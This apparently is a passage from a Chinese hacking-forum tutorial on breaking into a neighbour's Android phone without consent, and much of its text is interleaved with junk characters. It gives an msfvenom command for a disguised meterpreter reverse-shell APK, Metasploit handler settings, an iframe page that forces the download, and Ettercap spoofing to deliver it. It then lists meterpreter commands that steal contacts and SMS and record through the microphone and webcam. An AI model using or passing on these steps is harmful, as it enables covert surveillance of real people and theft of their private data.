五、msf+ettercap入侵邻居安卓手机 * }! g! `: v; L
7 I9 J* e+ c8 D# e首先启动msf
, e+ ~$ F4 U8 v 先用kali生成一个安卓木马,如下命令: ' A3 l# ?& r ^3 x* X* x2 ~
7 U7 l# s7 o# ~& l/ S2 Q7 V* {* r) C5 G. u9 T1 @1 [ Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk $ u" {. G0 \# ]9 t
+ d2 F3 w" y- b: U' b/ |' c4 j5 U- w为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻
, u: ^3 J- w7 z% P* Q6 E然后进入msf
2 d- F+ A& W# b! t4 e# u" o) b& R" P9 M! x+ T, M use exploit/multi/handler
set payload android/meterpreter/reverse_tcp . t" k8 ^& ^ g3 o2 f2 u' w
set LHOST 192.168.0.109 //ip为kaili的ip
; a& z; ?6 ~' M) W+ {5 r/ y) x4 [: M) V% p' h; j8 q3 y set LPORT 44444 //端口一定要与前面生成的木马的端口一致
Exploit 1 E/ T" o" ]8 V) M
5 J" P/ j& f4 E
下面我们开启ettercap -G 0 p( S' s; [3 Y. V. E
我物理IP为 $ g& U. L+ @ u4 B6 [# p) M7 a
. C; j. S% Y) O7 y% D6 Q' |3 k" c, u# u# ]' `# v9 `/ l5 y6 a! q
7 a$ g, Q% n0 @- t/ t; B" C7 W" N 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, # q$ G# D0 ]+ D2 X9 J
. k& j7 v0 i% g* q 下面我们来设置一下 # `5 h& @; _+ |8 I& A
{2 y6 y+ {# |! i
+ e7 d/ s6 l' Z% J! D. z; O 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了,
# x( Z* H) W4 \% ?, j5 ?- ] 9 h1 o0 g8 e) y$ y! g9 u" K0 h* i
" E5 K' O' P% K+ Z* c- X( o5 \2 n; l7 j h9 V! {' U . O+ p3 r1 R/ ]3 }0 D! X* P0 m2 |
8 c: `2 h& q: I, \4 V/ H. ?# p) E" p: x* S
/ D5 D& B5 j( u$ v3 r9 E9 i- N, O. M* ^, ~ " P* r9 A" ?8 Z0 K! F( U4 p
4 B7 Y7 H8 ^1 J. U
& c- K1 F; Q& l) S% B4 C6 u+ K) P# K
& H" v- s3 t7 e
# v( V7 B$ y: r: K2 m0 `% u
5 A9 j9 M3 n: V, ~% p" p3 u: d, p, y' ^0 w5 [. @! c3 B8 C7 H
8 f* R+ p! h, k C9 v Y+ y' k5 o1 k5 a* Q
: G! ~3 G! B3 C p6 ]9 A0 \, [5 T o
( p3 f" B8 v% M6 @6 V# @
$ f* H' c3 _$ Q( U" `5 Q% s下面我们开始攻击 % k( L1 O1 z3 O% R4 n: Z
! e/ k% ?9 P& y6 E% ?3 S# Q. C1 A9 j5 Y H5 c
1 o' L& A: Q5 s! @& ~) n! a
2 L7 y/ R5 q" Z) u1 u; j% |& K
5 e# f: k. X' I# q0 Z* Z6 K: Q# D6 o) T& S8 }: Y
7 e8 x6 s2 k. A+ g i! I& u( [0 n1 d & E; B! i% z k) d
9 L0 d0 p4 ^; C1 I n$ `& W2 B 大概过了5分钟多,发现反弹成功了 : O8 ]* z- m$ o# ^+ q0 l! x
+ z1 U: v1 ?! c4 u5 l8 P* f0 {1 F& X$ d3 t& ^ / r$ H. Y' Q) r; d$ {' N
' A5 [( N/ _( o0 b: A
' A' X! f o- \) r) i8 U4 a8 n7 y& }3 S9 D5 c2 Q R/ }
3 ?3 b8 [; U6 u3 ]0 Z4 ~
2 c( j) s6 V/ b# ?# s) B- i & m6 ]% Z% z7 i, X5 m
2 b, D2 t: c- ]% }! u, `
7 m# G) x2 Y- v# y
执行命令
& u$ o5 A6 d1 g: y J dump_contacts --》这个是导出电话 C F) ?! v a7 z3 a
6 B3 h) S* Q1 v0 l. n: L; c& A: |5 W, O dump_sms --》这个是导出信息 % T$ u4 q& V; c1 [
. ~7 l" d6 G( y! d% k" h3 J7 M& F+ z# U3 ^5 x record_mic Record audio from the default microphone for X seconds
s; i4 ] o) I6 v' R, b! H# J0 B' e1 b webcam_chat Start a video chat ( m# d) u% m2 U2 v# U
% P l U& y( y6 v9 H! ?+ a, m7 {% U" Y/ e% P webcam_list List webcams ! D2 V H! P/ n! B
, _3 J% {0 P2 g5 ?0 q& ^6 a9 s+ ?+ V r+ \7 V webcam_snap Take a snapshot from the specified webcam
' U8 ^+ {- z9 S9 [# n" J0 B/ Q webcam_stream  lay a video stream from the specified webcam 4 a+ i: O Z6 q+ |" V. @& _8 A6 w
: W3 ^- l) f4 F# ~) L% i" N2 y2 z( b2 m, K4 A" V" e; g6 R
6 d2 c0 B% S7 o( Q# {% n2 q & x* f. x5 ^" m; n
% Z( f$ F, ?6 ]2 ]. G我们打开看一下电话薄, # P! G% N( {! D2 _9 f2 O8 z* w
' k0 [+ b4 P0 w9 z' ~# v+ R# U+ v% X. o+ D9 K" z
+ i) g4 L9 V' p0 E0 \$ W
/ m2 U% ^$ C, _: _, x/ R& G- n& r$ n% Y+ \
5 p) h, I( M8 }/ c
" R3 I4 T( P/ `; ? s, U3 n1 p1 B3 J
7 E) e+ }/ [( |, ?
" }6 b7 @. V& Y( {% F- Q0 ^ 我们同时欺骗成DroidJack木马,使用方法如图:
* }# B1 r. x0 s
, w5 a' V: |& B) J' b
2 x) l d% G. x' P
切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口
8 ?; I: m/ A% ~; L2 A # v9 f& @2 ]3 P6 E8 t5 t! k
! a; H9 F. r6 I8 `3 e, Q0 D! Z; {* O" ]3 y2 W
7 Q. T! L3 T" x# Y1 T2 r8 E# G" S" l4 }- a. n 5 { V7 ~- I# U6 l
2 y# f* x9 e* e) R% s) n
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) | Powered by Discuz! X3.2 |